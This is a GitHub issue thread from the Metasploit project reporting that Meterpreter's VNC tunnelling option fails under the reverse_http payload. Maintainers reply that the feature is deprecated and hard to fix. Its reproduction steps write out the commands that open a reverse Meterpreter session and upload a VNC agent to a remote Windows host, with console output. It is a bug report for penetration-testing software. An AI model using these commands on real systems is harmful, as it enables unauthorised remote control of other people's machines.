### ISSUE TITLE
 'run vnc -t' not working under reverse_http payload

### ISSUE THREAD

**Issue by vipzen** [rapid7/metasploit-framework#12190]
Meterpreter's `run vnc` command has the` -t` option, that tunnel a vnc connection through the current session connection. But this option fail if using reverse_http payload.
Under reverse_tcp, everything works fine. The problem seems specific to reverse_**http**.

## Steps to reproduce

Set the handler:

- `use multi/handler`
- `set payload windows/meterpreter/reverse_http`
-  `run -j`

(wait for  reverse connection from remote side)
```
[*] Encoded stage with x86/fnstenv_mov
[*] Sending encoded stage (179804 bytes) to 192.168.1.12
[*] Meterpreter session 5 opened (192.168.1.2:8088 -> 192.168.1.12:2528) at 2019-08-13 14:27:03 -0300
```

- `session 5`
```
[*] Starting interaction with 5...

meterpreter > 
```
- ` run vnc -t`

```
[*] Creating a VNC bind tcp stager: RHOST=127.0.0.1 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\ffsdhAnUgi.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.2:4545...
[*] Starting the port forwarding from 4545 => TARGET:4545
[*] Local TCP relay created: 127.0.0.1:4545 <-> 127.0.0.1:4545
```
At this point, the vncviewer is lauched and try to connect to 127.0.0.1:5900, without success.
If `run vnc` is invoked with another options (like `-i` or something) and without `-t`, everything works fine. 

Relevant framework.log entries
```
[08/13/2019 14:16:16] [e(0)] core: The accept() returned nil in stream server listener monitor:  #<Socket:fd 14>
[08/13/2019 14:16:19] [e(0)] rex: Error in #<Rex::Services::LocalRelay:0x00007f906282aa60> monitor_relays read: end of file reached
[08/13/2019 14:16:19] [e(0)] rex: Error in #<Rex::Services::LocalRelay:0x00007f906282aa60> monitor_relays read: end of file reached
[08/13/2019 14:16:19] [w(0)] core: monitor_rsock: exception during select: Rex::StreamClosedError Stream #<TCPSocket:0x00007f905f8c1d00> is closed.

```

### Metasploit version

 metasploit v5.0.41-dev-e1e1cd9020  

### I installed Metasploit with:
- [X] Source install, ruby 2.6.3p62 (2019-04-16 revision 67580) [x86_64-darwin18]

### OS

macOS Mojave 10.14.6

**Comment by wvu-r7** [comment]
Meterpreter scripts aren't supported anymore, though they still work. I don't think there's a post module for this one, and VNC support hasn't been upgraded in a while.

**Comment by bcook-r7** [comment]
There are a number of bugs here: even if we got it to work with reverse_http, this also is going to have high latency and not be very usable. Definitely a lot of work here if we wanted to fix it.
